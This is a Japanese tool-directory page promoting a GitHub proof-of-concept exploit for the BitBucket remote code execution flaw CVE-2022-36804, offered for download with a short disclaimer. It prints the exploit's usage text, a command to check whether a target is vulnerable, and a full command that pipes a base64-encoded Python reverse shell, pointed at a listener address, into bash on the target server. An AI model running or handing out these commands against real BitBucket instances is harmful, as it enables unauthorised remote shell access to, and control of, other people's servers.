Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-36804 — BitBucket RCE CVE-2022-36804 用の実際のエクスプロイト | Kitploit
ツール/GitHubGitHub/notdls/cve-2022-36804
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツール
GitHubnotdls/cve-2022-36804

CVE-2022-36804

BitBucket RCE CVE-2022-36804 用の実際のエクスプロイト

リポジトリを見る
3571年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-36804 PoC

このリポジトリには、最近の BitBucket リモートコード実行の脆弱性 (CVE-2022-36804) に対するシンプルな概念実証エクスプロイトが含まれています。この脆弱性を悪用するには、対象インスタンス上のリポジトリへのアクセスが必要です。認証情報を持っていない場合、ターゲットには公開リポジトリが必要です。

使用方法

root@kitploit:~
usage: exploit.py [-h] -p PROJECT -r REPO -u URL [-c COMMAND] [--proxy PROXY] [--session SESSION]
                  [--check]

Exploits the CVE-2022-36804 RCE in vulnerable BitBucket instances (< v8.3.1)

optional arguments:
  -h, --help            show this help message and exit
  -p PROJECT, --project PROJECT
                        The name of the project the public repository resides in (E.g.
                        testproject)
  -r REPO, --repo REPO  The name of the public repository (E.g. testrepo)
  -u URL, --url URL     The URL of the BitBucket server (E.g. http://localhost:7990/)
  -c COMMAND, --command COMMAND
                        The command to execute on the server (E.g. 'curl http://canary.domain/')
  --proxy PROXY         HTTP proxy to use for debugging (E.g. http://localhost:8080/)
  --session SESSION     The value of your 'BITBUCKETSESSIONID' cookie, required if your target
                        repo is private. (E.g. 3DD8B1EBA3763AD2611F4940BD870865)
  --check               Only perform a check to see if the instance is vulnerable

例

インスタンスが脆弱かどうかを確認する

インスタンスが脆弱かどうかを確認するには、次のコマンドを実行します。

root@kitploit:~
python3 exploit.py -p PROJECT -r REPO -u http://target.site/ --check

リバースシェルを確立する

以下のコマンドを使用して、被害者上にリバースシェルを確立できます(base64ペイロードは、リスナーの詳細に合わせて更新する必要があります)。

root@kitploit:~
python3 exploit.py -p PROJECT -r REPO -u http://localhost:7990/ -c "echo 'cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC42Ny4zIiw4ODg4KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCIvYmluL3NoIikn' | base64 -d  | bash |"

クレジット

  • TheGrandPew - バグの発見と報告

免責事項

このエクスプロイトは教育/研究目的で提供されています。使用方法については一切責任を負いません。どうか良識を持ってお使いください :)

ツールをダウンロード